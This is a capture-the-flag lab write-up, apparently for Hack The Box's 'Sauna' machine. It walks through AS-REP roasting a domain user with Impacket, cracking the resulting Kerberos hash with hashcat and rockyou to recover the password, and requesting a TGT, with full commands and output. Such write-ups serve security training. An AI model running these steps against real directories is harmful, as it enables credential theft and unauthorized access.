InfoSec LAB

Sauna_ASREPRoasting

Created: 2 min read

ASREPRoasting

Although I wasn’t able to get any additional users out of a brute-force attack after learning the naming convention, I still have 2 valid domain users extracted from the initial brute-force attack against the target KDC. Since it appears that there isn’t any other attack vector, I will try to work with these 2 users

considering i only know of 2 valid domain username without password, it would be a good idea to start with asreproasting

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile valid_users -request -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] kerberos sessionerror: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] kerberos sessionerror: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$fsmith@egotistical-bank.local:307dbe778ef04ab4d2cfbb4f8dbebba9$fdd98cb2d80cc2b43db211f26d29d1aba4032cd2885a3e62a4cb16eddb796656f1f97c604805596ba70fd169ae370a3aa98e63caebca912bbd4293d810479cc43830fc0cc22911a05833f98fbea8b60aa87492cbd27f098a674132d8bc32b470853d057520d8abb2788ef0e1d2cdbed911fc7d951daa36d73216230c822add4f545e73e0ffa9f8c8a4b0270b2071a2bd15e5cf916c7dd17e0ed0880ff4d995a6155599ab9f147fe0772207378b176eec74900619ac45a19a42a47cd12966b3e5a0135bc900d7859c7f3232ddfcf765789dc1043fc63fe515bc733a22a54185c830b8b078cd57e8d35acdb916539e632410443023df650b32571ff6cbde7ded8b
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set

It turns out that the fsmith user has the UF_DONT_REQUIRE_PREAUTH bit set, effectively resulting in hash extraction from ASREPRoasting. This is very much unlikely situation, but here we are. Lucky me.

Time to get cracking

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ hashcat -a 0 -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:307dbe778ef04ab4d2cfbb4f8dbebba9$fdd98cb2d80cc2b43db211f26d29d1aba4032cd2885a3e62a4cb16eddb796656f1f97c604805596ba70fd169ae370a3aa98e63caebca912bbd4293d810479cc43830fc0cc22911a05833f98fbea8b60aa87492cbd27f098a674132d8bc32b470853d057520d8abb2788ef0e1d2cdbed911fc7d951daa36d73216230c822add4f545e73e0ffa9f8c8a4b0270b2071a2bd15e5cf916c7dd17e0ed0880ff4d995a6155599ab9f147fe0772207378b176eec74900619ac45a19a42a47cd12966b3e5a0135bc900d7859c7f3232ddfcf765789dc1043fc63fe515bc733a22a54185c830b8b078cd57e8d35acdb916539e632410443023df650b32571ff6cbde7ded8b:Thestrokes23
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:307dbe7...7ded8b
Time.Started.....: Sat Mar 25 17:49:22 2023 (8 secs)
Time.Estimated...: Sat Mar 25 17:49:30 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1126.7 kH/s (0.44ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539264/14344385 (73.47%)
Rejected.........: 0/10539264 (0.00%)
Restore.Point....: 10538496/14344385 (73.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Thip1812 -> Thebasket_zaa
Hardware.Mon.#1..: Util: 61%
 
Started: Sat Mar 25 17:49:21 2023
Stopped: Sat Mar 25 17:49:32 2023

hashcat was able to crack the hash The cracked password is Thestrokes23

Now I need to validate the credential

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-gettgt egotistical-bank.local/fsmith:Thestrokes23 -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in fsmith.ccache

The credential of the fsmith user has been validated through the target KDC The forged TGT will be used from here on out for better OPSEC

Interactive Graph View

Backlinks